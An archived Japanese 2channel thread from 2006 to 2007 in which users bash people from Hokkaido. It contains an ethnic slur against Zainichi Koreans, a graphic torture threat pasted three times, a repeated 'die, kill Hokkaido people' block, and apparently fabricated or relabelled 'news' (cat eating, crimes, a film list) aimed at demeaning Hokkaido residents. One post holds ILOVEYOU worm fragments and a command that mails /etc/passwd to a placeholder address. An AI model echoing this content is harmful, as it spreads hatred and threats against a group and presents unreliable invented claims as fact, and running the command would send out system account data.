  |よし| ΛΛ  |よし| ΛΛ   |よし| ΛΛ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 〃 ̄∩ ゚Д゚) 〃 ̄∩ ゚Д゚)  〃 ̄∩ ゚Д゚) < 全員一致では在日チョンは逝ってよし!
    ヾ.   )    ヾ.   )     ヾ.   )   \______________
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
\                                                \
  | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ |
  |          逝ってよし認定委員会                    |
  |                                           |


205 :名無し:2006/09/15(金) 15:40:21 ID:nD5MxbiB
http://www.youtube.com/watch?v=6MFO3GK7TAk

206 :ナナシズム:2006/09/17(日) 04:55:40 ID:9OsdKNul
いや、別に北海道嫌な奴は出ていけばいいよ。
大体文化が無い、って意味がわからない。外タレが来る事が「文化的」なの?
まだ歴史が浅いんだから、「北海道独自の文化」なんてそんなあるわけないじゃない。
それを作っていこう、っていう気概も無しにブツブツ言うだけなら…ねぇ。

207 :ナナシズム:2006/09/18(月) 11:11:52 ID:sF5PycHG
北海道は住むと3日で飽きる。

208 :ナナシズム:2006/09/18(月) 14:13:49 ID:Am7QjZBv
>>206

たとえば大概の外タレコンサートは札幌スルー。東京に行かないと見れないべ
文化レベルがあまりにも低いから客が入らないんだよ、札幌は・・・
東京、大阪、名古屋、福岡とは大違いだろ。ダッサーwwww

209 :ナナシズム:2006/09/18(月) 14:15:08 ID:Am7QjZBv
>外タレが来る事が「文化的」なの?

まさにそうに決まってるじゃんwww

210 :ナナシズム:2006/09/19(火) 15:08:01 ID:hIwWMFhu
外人至上主義な阿呆が集まるスレですか?

211 :ナナシズム:2006/09/22(金) 19:17:34 ID:uWXtsccd
ドーミンは揚げ足取り至上主義。反論もできない馬鹿だからw

212 :ナナシズム:2006/09/23(土) 10:13:15 ID:B25HJS1Z
反論は禁止です
ザンギでもくってろ

213 :ナナシズム:2006/09/24(日) 02:22:18 ID:yThdNA1u
ドーミンしんでくれ

214 :ナナシズム:2006/09/24(日) 04:26:07 ID:Ph6mV9LP
相変わらず馬鹿集合してる恥ずかしいスレだなw

215 :ナナシズム:2006/09/24(日) 04:54:11 ID:???
とりあえずどーでもいいすれだしsageない?

216 :ナナシズム:2006/09/24(日) 06:39:32 ID:+GeunJ1c
北海道はよー国として独立しちゃえば?
酪農・農業はすばらしいし、経済も悪くはない。
日本相手に貿易すれば十分な黒字を出せるし。かなり豊かな国になるんじゃないの?

まあ日本人には大損害だけど。

217 :ナナシズム:2006/09/24(日) 14:39:26 ID:HgVAHlyG
大賛成!

218 :苫小牧セレブ ◆LcbOIIzvDU :2006/09/28(木) 02:42:33 ID:fynvg4Rq
北海道のありがたさに気付いた時には遅いわね(笑)





219 :ナナシズム:2006/09/28(木) 16:57:42 ID:czs0rgRq
内地の人間は身の程を識ってからカキコしなよww

220 :ナナシズム:2006/09/28(木) 23:23:13 ID:???
>>218だろうなwww

221 :ナナシズム:2006/09/29(金) 18:58:55 ID:d2OIVKNh
>>216
良い考えだ。
が、内地の人間が許すはずも無い。

222 :ナナシズム:2006/09/29(金) 22:45:06 ID:???
繁華街を特攻服姿の集団が、グループ名や自分の名前を大声
で叫びながら歩き回る「徒歩暴走族」が、札幌市内に、“冬季限定”
で出現している。北海道は冬に積雪でバイクや車での暴走が
出来ないことから、このような方法で勢力誇示しているもので、
大声を出したり、暴力行為など迷惑行為や事件を繰り返している。

http://dailynews.yahoo.co.jp/fc/domestic/recklessly_driving/?1159535478

あのさあ、ドーミンよ、日本人やめてくれない?
こんなことして恥ずかしくないの?
これのどこがカッコイイの?キモカッコワル。

ドーミン バーカ 

シネ サッサト

223 :ナナシズム:2006/09/29(金) 22:47:17 ID:???
>>222

これは確かにバカとしかいいようがないなwww

224 :ナナシズム:2006/09/29(金) 23:02:27 ID:53ovm5/W
サイアクじゃん

225 :ナナシズム:2006/09/30(土) 11:08:42 ID:???
http://www.mainichi-msn.co.jp/shakai/wadai/news/images/20060930k0000m040105000p_size6.jpg

ドーミンの実態

226 :ナナシズム:2006/10/03(火) 14:48:16 ID:tViAWYtu
また、創価学会かぁ。
ほんと、アホだよな。
創価学会は、八巻を欲しがっているんだ。それで意地悪して、
凹んだら、創価学会に入りなという作戦。
http://tmp6.2ch.net/test/read.cgi/company/1154601780/l50
http://kangaeyou.hp.infoseek.co.jp/925_1022421835.html


227 :ナナシズム:2006/10/12(木) 13:40:19 ID:23DpKJ7/
いままで巨人ファンばっかで日ハムに冷たかったくせに

228 :ナナシズム:2006/10/13(金) 02:16:08 ID:I6ycy5EC
チバロッテノファンノミナサンガイチバンデス!!

229 :ナナシズム:2006/10/13(金) 04:23:14 ID:DnPQQtEu
必死になってバカにできる事探して、それに時間費やしてバカ同士で盛り上がって。道民よりお前らの方がよっぽどクズじゃない?

230 :ナナシズム:2006/10/13(金) 19:08:15 ID:isEDAPfo
お前の指の爪を一枚一枚剥ぎ取って、小指から順に一本一本骨を折ってやりたい・
その状態で頭から熱湯を浴びせて、彫刻刀でゆっくり目玉をくりぬきたい・・
そして苦しんでる顔を堪能してから、、下顎の骨を砕いて外す、、
ナイフでゆっくり胸の皮を削ぎ、肉を切り裂いて。
心臓をぶっ潰したい!! 
内地人バカにすんじゃねーぞ!

231 :ナナシズム:2006/10/14(土) 01:30:34 ID:xpctmuTP
必死だな、道産子。

あー弱者いびりは楽しいねえ。
由緒正しい日本人でなければできない遊びだよ。
まあ、嗜みのひとつって事で。

お前らは俺らの気分で運命すら左右される
野蛮人と罪人のなれの果てなんだよ。
悔しいか?理不尽か?そうだろうなあ。

でもそれはお前らが悪いんだよ。
少数派で弱者だからな。
誰もお前らを守ってはくれない。
お前ら自身で自分の身すら守れない。

みじめだねえ。

232 :ナナシズム:2006/10/17(火) 01:45:52 ID:0gj/1rgI
お前の指の爪を一枚一枚剥ぎ取って、小指から順に一本一本骨を折ってやりたい・
その状態で頭から熱湯を浴びせて、彫刻刀でゆっくり目玉をくりぬきたい・・
そして苦しんでる顔を堪能してから、、下顎の骨を砕いて外す、、
ナイフでゆっくり胸の皮を削ぎ、肉を切り裂いて。
心臓をぶっ潰したい!! 
内地人バカにすんじゃねーぞ!

233 :ナナシズム:2006/10/17(火) 08:04:54 ID:vWxy1NV6
北海道民が嫌ならこういうスレ立てなきゃいいのでは…。
反論禁止って…反論されたら言い返す自信がないからとしか思えない…反論されたらまた反論し返せばいいのに…。
嫌いならほっとけばいいのに…
私福岡だけど、別にフクオカンコクとか言われても「だから何?」としか思えないし。ただ何でフクオカンコクなのかが知りたい。確かに韓国人は多いけど。
暴走してるのだって、一部の人だし。

234 :ナナシズム:2006/10/18(水) 16:25:34 ID:VBbNCbwL
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


235 :ナナシズム:2006/10/18(水) 20:06:48 ID:y4fzAeVv
どうでもいいからジンギスカン奢ってくれよ道民

236 :ナナシズム:2006/10/19(木) 02:40:17 ID:lje2x4SK
>>192
北海道に部落はある。
港町付近には893も多い。
嘘言うな

237 :ナナシズム:2006/10/19(木) 02:46:13 ID:lje2x4SK
>>192
http://www2.odn.ne.jp/~aat67780/page028.html
これ読んでみろ

238 :ナナシズム:2006/10/19(木) 02:52:21 ID:lje2x4SK
>>233
韓国人はどこで居るんだよ馬鹿。
福岡は主要都市、当然居て当たり前だ。
一番多いのは東京・関東。
次いで大阪。
福岡は5位にも入らない。
韓国に近いからという理由で言う奴も居るだろうが、
一番韓国に近いのは福岡ではなく長崎。

それに遺伝子レベルの話になると、福岡含めて縄文系遺伝子が濃い。
つまり、北海道・一部東北・九州・沖縄が縄文系遺伝子が濃いことになる。
酒に強い文化に、まず韓国遺伝子はありえない。
だから安心しろ

239 :ナナシズム:2006/10/19(木) 04:37:11 ID:qHXZIKo5
ドー ミンシネ

240 :大阪:2006/10/19(木) 10:08:02 ID:???
大阪出身の自分も言ってもいいか

241 :ナナシズム:2006/10/19(木) 11:10:15 ID:d6J+nzR4
言わせてもらえば、、

「田舎」は嫌いじゃないけど、
イナカ人気質な人間は嫌い。

→排他的・差別意識強い・偏見的・自己中・強い者に弱い・
地元マンセー・都会(人)を否定・違う価値観を認めない・・etc

242 :ナナシズム:2006/10/19(木) 18:21:44 ID:12weO7Qg
>>240
イラネ

243 :ナナシズム:2006/10/26(木) 01:13:45 ID:6xSHkWNZ
たかり物まね糞道民 ラーメン、スイーツ、スープカレー
流行れば皆がまねをする そして供給過多になり 業界を
駄目にする。 ばか馬鹿道民 商売知らず


244 :ナナシズム:2006/10/29(日) 20:17:26 ID:0xbYW9N8
http://society3.2ch.net/test/read.cgi/jsdf/1141563949/



↑使えない道民かつ税金泥棒の巣窟

245 :ナナシズム:2006/10/29(日) 22:10:50 ID:???
はい、北海道人です。全員氏にましたからもうほっといてください。

246 :梁山泊:2006/10/29(日) 22:57:59 ID:5kgAOJ9Y
申し訳ないm(_ _)m

スレ主は基地外なのでお気になさらないでください。

一般の者は北海道の方大好きです!

基地外は檻に入れておきますのでご安心を!

247 :ナナシズム:2006/10/30(月) 14:28:32 ID:XDOykZ/R
北海道はいい所だから好きだ
道民もいい人多いよ。


248 :ナナシズム:2006/11/06(月) 22:47:22 ID:tRXFIG4H
ドーミンはイメージと違って冷たい人間が多いのはなぜ?

249 :ナナシズム:2006/11/07(火) 05:50:09 ID:???
俺中部地方住みでいろんなとこ旅行いったけどはっきりいって関西人の方がうざいわ
あと九州と沖縄もなぜかその辺の気質って時間にルーズ、信号無視、電車の乗り降りは降りる人が先なのを守らないのが当たり前なのかね
弥生人・新モンゴロイドの遺伝子か

250 :ナナシズム:2006/11/10(金) 16:01:57 ID:???
道民が地元好きなのは、自分たちの先祖が劣悪な環境の中で開拓に励んで
やっと手に入れた土地を愛したいと思ってるからなんじゃないかな?

北海道には歴史がない。古くからの文化なんてない。みんな移住者だから。
新しもの好き、飽きやすい。干渉するのもされるのも嫌い。

自分は道民だけど、まさに上記のような性格。
ただ、内地の人に「北海道はいいですね〜」といわれても、
あなたのとこだっていいもの、誇れるものはいっぱいあるでしょう?
すばらしい文化があるんじゃないか?って思う。

道民に危害を加えられたのかもしれないけど、自分が気に入らないところを
述べてなにがしたいのかわからない。馬鹿を治せといわれてるのだろうか?

そういや、道民のイメージってなんだろう?
自分の近所でも職場でもみてみれば、優しい人明るい人嫌みな人無関心な人
いろいろいるだろう。傾向はあるにせよ、どこもたいして変わらない気がする。

ただ、ここの意見を見てて、反省点がいっぱいあるなと思った。
せめて観光に来てくれた人には「いいところだったね」って思ってもらえるように
努力したいよ。
長文スマソ。

251 :ナナシズム:2006/11/16(木) 11:13:39 ID:VAAobrVV
お前の指の爪を一枚一枚剥ぎ取って、小指から順に一本一本骨を折ってやりたい・
その状態で頭から熱湯を浴びせて、彫刻刀でゆっくり目玉をくりぬきたい・・
そして苦しんでる顔を堪能してから、、下顎の骨を砕いて外す、、
ナイフでゆっくり胸の皮を削ぎ、肉を切り裂いて。
心臓をぶっ潰したい!! 
内地人バカにすんじゃねーぞ!

252 :ナナシズム:2006/12/02(土) 08:00:07 ID:JBo91ZM7
北海道だけは大嫌い

253 :ナナシズム:2006/12/06(水) 22:28:19 ID:j2P9mEZC
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人

254 :ナナシズム:2006/12/07(木) 08:34:38 ID:wIVPe0n8
大阪民国と同じだな

255 :ナナシズム:2006/12/07(木) 10:00:49 ID:???
アジア人

これだけ読んで把握した

256 :ナナシズム:2006/12/09(土) 13:27:29 ID:7xn7u+oD
さて、帯広のばんばが在日企業に救われたわけだが・・・
北海道人ってカネがないくせに口だけは一人前だよね!

257 :ナナシズム:2006/12/09(土) 13:41:06 ID:???
>>256
じゃあ君はよほどのお金持ちなんですね!すごいですね!
僕はそんな君の事をくだらない人間に思います!


258 :ナナシズム:2006/12/09(土) 16:10:36 ID:pCWoEP6o
>>253
友達作れよ!

259 :ナナシズム:2006/12/12(火) 00:54:22 ID:???
自分は北海道民だが、馬鹿というか嫌な奴は道北に多いという意見はよく聞くな。特に稚内が痛いと聞いた。旭川から上は行った事ないので知らないが。

260 :ナナシズム:2006/12/12(火) 05:27:12 ID:wQT+5qas
1 名前:日出づる処の名無し 2006/12/11(月) 07:11:55 ID:NbigReMm
輓曳競馬→ソフトバンクに救済される
ハドソン→コナミの100%子会社
雪印(冷菓部門)→ロッテスノー

在日にキンタマ握られる北海道人
そのキンタマを潰されないように
在日様には誠心誠意つくせよwwww

12 名前:雪もぐら@ノース :2006/12/11(月) 23:59:12 ID:xw2hwuBd
>1
ボーダフォン→SOFTBANK
ダイエーホークス→SOFTBANKホークス



投資と慈善事業の区別が付かないって、
やっぱり道民は奴隷階級に固定したほうがいいわwww

261 :ナナシズム:2006/12/12(火) 05:41:04 ID:???
優秀な北海道民がつくった作品
北海道作品年鑑 小説・TV・映画
1989年 【映画】愛乱
1990年 【小説】ウイルス壬辰倭乱 【映画】将軍の息子
1991年 【TV】黎明の瞳 【映画】将軍の息子2 【映画】従軍慰安婦 【映画】死の賛美 
1992年 【TV】憤怒の王国 【映画】将軍の息子3 【映画】キムの戦争 【映画】シラソニ
1993年 【小説】ムクゲの花が咲きました 
1994年 【小説】下品な日本人 【紀行文】悲しい日本人 韓国名[日本はない(1993年)]で出版 【TV】対局 【TV】ぬか喜びの祝杯 【映画】一振りの時間の中で 
1995年 【小説】FireDay 【紀行文】続・悲しい日本人 【映画】ムクゲの花が咲きました 【映画】暗殺 【映画】ナムヌの家
1996年 【紀行文】新・悲しい日本人 【TV】嫁三国志 【映画】極道修行・決着  【映画】倩天国
1997年 【映画】高手
1999年 【映画】幽霊
2000年 【映画】アナーキスト
2001年 【小説】皇太子妃拉致事件 【映画】サウラビ
2002年 【小説】百済書記 【TV】野人時代(最高視聴率51%) 【映画】ロストメモリーズ
2003年 【映画】アリラン
2004年 【TV】不滅の李舜臣(最高視聴率33%) 【TV】海神 【映画】多黙 安重根  【映画】風のファイター
2006年 【映画】韓半島

262 :ナナシズム:2006/12/12(火) 06:39:31 ID:um7+kryb
友人が北海道旅行に行った時、食堂で焼肉を食べていたら、隣のテーブル
の主婦が赤ん坊をテーブルに載せてオムツを代え始めたそうだ。

北海道では驚くことではないみたいだよ。
私が道民の家で食事をご馳走になったときのこと、
2歳くらいのその家の男の子がむずかりだすと母親がその子を
テーブルの上に立たせてパンツを降ろし、牛乳の空き瓶をその子の
チンチンにあてがうとその子が牛乳瓶に小便をした。
しかも、あろうことかその牛乳瓶に入った小便をキッチンの流しに捨てたのだ。
その慣れた様子からも日常的にそういうことをしているのだとわかった。
やはりこういう人種とは相容れられないなと強烈に思った瞬間だった。

263 :ナナシズム:2006/12/12(火) 09:11:17 ID:jlRFvOFB
進学や就職で田舎から都会に出ようとしても東京より札幌の方が良いと本気で思っているのは事実だよ。
他の県とか興味無いし行かないし、どっちかと言えば意気揚々とやって来るのはお前らだしなぁ。粘着しないでほっといてくれればいいのに。

264 :ナナシズム:2006/12/17(日) 07:29:45 ID:PQ92HW+8
:<丶`∀´>さん :2005/11/19(土) 05:54:29 ID:MK+iWpaK
  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  | 道民ってうざいよね〜
  \  _______
   V
  ∧_∧∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ( ・∀・)´∀` )< だよね〜、誰か殺してくれないかな?
 (    )    )  \_______________  ∧ ,∧
 | | || | |                           (・д・,,)ペッ!!
 (__)_)__(_)            ∧ ∧?          、'(_@
                     (´⊇`)
                     (道民)
                     || |
  ∧ ∧ムカムカ           (((_)_)
  (#゚Д゚) ̄ ̄ `〜                   ∧ ∧
    U U ̄ ̄UU                     (   ) イッテヨシ!!
  へ                            |  ヽ
/    ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| ったく、乞食みてーに動物のエサを横取りしてんじゃねーよゴルァ!!
\________________________

265 :ナナシズム:2006/12/17(日) 23:23:24 ID:Pk6BAyTa
地域単位での格付け、一体感の強さ。
こーゆうのがいると俺まで同じ日本人として同じように見られるんだろうな。
2ちゃんにいると日本人の民度の低さがよー分かる

266 :ナナシズム:2006/12/18(月) 06:59:51 ID:???
●性犯罪者、速すぎた検挙
旭川中央警察は14日、独身女性の住むアパートに侵入し、
金品を盗んで性暴行をしようとした疑い(特殊強盗・強姦)で、
佐藤某容疑者(43歳)に対して逮捕状を申請した。
警察によれば佐藤容疑者は9月10日の午前4時頃、
旭川の某アパートAさん(女)宅の玄関から侵入し、
家にあった現金55,000円を盗んでAさんを性暴行しようとしたが、
抵抗されて逃げた疑いを受けている。
佐藤容疑者は犯行後に車に乗って逃走し、
速度超過で取り締まりのカメラで摘発され、
警察が違反車の運転手を相手に捜査の包囲網を狭めて行き、
被害者の住むアパートに行った周辺の経緯を察し、
張り込みをしていた警察に検挙された。

●北海道エステ店経営者ら3人を摘発 /愛知
県警保安課と中署などは13日、名古屋市中区栄、エステ店経営、鈴木芳之(50)と
北海道本籍で妻の李淑伊(43)の両容疑者を風営法違反(無届・禁止区域営業)容疑で、
中国籍の同店従業員の女(40)を入管法違反(旅券不携帯)容疑でそれぞれ逮捕した。
鈴木、李の両容疑者は昨年6月に無届けでファッションエステを開業。従業員延べ12人を雇い、
月約100万円を稼いでいたとみて、県警で裏付けを進める。調べでは、2人は共謀し、
県公安委員会への届け出書を提出せずに、営業禁止区域である同区栄4で「北海道エステるびー」の
名称でファッションヘルスを営んでいた疑い。県警は、2人が女性従業員を使って男性客相手に
売春させていた疑いもあるとみて追及する。

●北海道人すり集団の3人逮捕、都内被害が倍増
JR中央線の駅構内で集団ですりをしたとして、警視庁捜査三課と上野署は30日までに、
窃盗容疑で自営業、吉某容疑者(44)ら北海道本籍の男3人を逮捕した。
調べでは3人は28日、JR国分寺駅(東京都国分寺市)構内のエスカレーターで、
埼玉県越生町の主婦(66)のショルダーバッグから、現金約2万円などが入った財布を盗んだ疑い。
3人には都内や千葉県で、3件の余罪があることが防犯ビデオの分析で判明。
吉某容疑者は昨年11月に千葉県船橋市の薬局で発生し、
2人が逮捕されたすり事件にかかわっていたことも分かっている。
捜査三課によると、北海道人すり集団によるとみられる都内の被害は、今年は980件。
昨年同時期と比べほぼ倍増している。

267 :ナナシズム:2006/12/18(月) 10:24:44 ID:???
なぜそんなに北海道に嫉妬してるの?

268 :ナナシズム:2006/12/18(月) 13:59:18 ID:???
>>267
だってウチさいたまなんだもん

269 :ナナシズム:2006/12/28(木) 08:04:26 ID:m4w+IKfp
北海道の女性は小便した後マンコ拭かないって本当?

270 :ナナシズム:2006/12/28(木) 09:10:27 ID:CHAoKcSW
>>269
それならまだいいよ。さいたまじゃウンコした後ケツ拭かないからねorz

271 :ナナシズム:2006/12/30(土) 20:08:27 ID:0cI1Kewn
糞スレ終了!!>>1はし寝!!

272 :ナナシズム:2006/12/30(土) 20:21:06 ID:Eg0+M5Vy
というかこんな糞スレはじめてみた…




ちなみにMEは北海道じゃないぞ

273 :ナナシズム:2007/01/15(月) 12:03:42 ID:+f0k1Yj3
●札幌市営地下鉄での醜態
http://sniffers.hp.infoseek.co.jp/kanokuni/densha005.JPG
http://sniffers.hp.infoseek.co.jp/kanokuni/densha008.JPG
http://sniffers.hp.infoseek.co.jp/kanokuni/densha011.JPG
http://sniffers.hp.infoseek.co.jp/kanokuni/densha015.JPG
http://sniffers.hp.infoseek.co.jp/kanokuni/densha022.jpg
http://sniffers.hp.infoseek.co.jp/kanokuni/densha024.jpg

274 :道民:2007/01/15(月) 18:36:53 ID:O7knY46s
>273
札幌市営地下鉄って言ってるが、違うのが混じってるよw
>1は底辺だね。一纏めにしすぎ。道民の底辺にも及ばないってか構成要素から外れてるね。憐れむよ

275 :ナナシズム:2007/01/15(月) 21:06:43 ID:O0ImIDvt
反論禁止て書いてあるんだから反論するなよ・・・・・
こういう時の為の慇懃無礼だろ。日本人の表現能力を使い分けないと。

276 :ナナシズム:2007/01/15(月) 21:18:17 ID:zce158Za
凄い凄い凄いクソスレ

277 :ナナシズム:2007/01/15(月) 21:30:07 ID:PzFvEcL+
ほっかいどうは殺人事件が少ないな、、

278 :ナナシズム:2007/01/23(火) 09:10:47 ID:69EYLwI0
●いまだ就職難の北海道で大学生が自殺
19日午後7時50分ごろ、札幌市北区の3階建てアパートの屋上に増設された部屋のトイレで、
佐藤さん(22)が首をつって死んでいるのを母親(50)が発見し警察に通報した。
発見当時、佐藤さんはトイレの柱に黒いナイロンのヒモをくくりつけ首をつって死亡していたとされている。
現場に遺書はなかった。
北海道D大学建築工学科の4年生に在学していた佐藤さんは、卒業を来月に控えており、
就職の問題で悩んできたことが警察の調査の結果明らかになった。
母親は警察で 「最近、息子の部屋を掃除していると、履歴書があちこちに落ちており、
履歴書用の写真も撮っていたのに、就職したという話はなかった。
卒業前に就職が決まらなかったというプレッシャーに苦しんできたようだ」と話した。
佐藤さんのほかの家族は「家庭環境にも問題はなく、
景気のせいで就職が難しいことを悲観し自殺したのではないか」と話した。

279 :ナナシズム:2007/01/23(火) 18:27:29 ID:HS4XqPdn
>>273
これ日本じゃないしww

280 :ナナシズム:2007/01/23(火) 19:43:58 ID:nrALtl7F
>>273
市営地下鉄には網棚ないからww

281 :0@:2007/01/23(火) 19:45:51 ID:3OMa7cSc
北海道は空気と景色の良いところでしたね〜懐かしい。
また行きたいな。

282 :ナナシズム:2007/01/28(日) 07:38:36 ID:t2hz6XsJ
北海道ではネコは食べるためにあり飼うためのものではありません。
そのためペットショップが存在しないのです。

●北海道のネコ肉消費は1日に1万匹
北海道人は1日に1万匹のネコを食べる。
このほど「食の北海道」と食材の豊富さで知られる北海道のネコ食に関する極秘資料が存在した。
この資料によると、ネコ肉の値段は、大きなネコで1キロ300円、小さいネコで170円。
ネコ肉は体を温める効果があるとされる。
一般的な料理は漢方薬の冬虫夏草とのスープ、しょうゆ煮込み、ヘビと鶏肉とのスープなどで、
値段も750−2500円程度とさほど高くはない。
札幌市には中央卸売り市場に併設した猫肉専門の店が計数十店舗軒を連ねている。
各店が1日平均130匹のネコを売るといい、
全体で約1万匹のネコが同市周辺の人たちの胃袋に納まる勘定だ。
主な仕入れ先は近隣の山や野良猫や保健所で処分待ちの猫とされている。
医師などの専門家からは「寄生虫が多い上、出血熱など動物の病気に感染する危険性が高い」
と指摘されてるにもかかわらず北海道では今もネコ食文化が継続されている。

283 :ナナシズム:2007/01/30(火) 00:50:37 ID:KZqFURR8
俺、北海道人だけどネコ食はウケたなあ〜!まあ確かにバカ多いし、理屈正論通じないからなあ〜 ど田舎行きゃ行くほど。

84 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)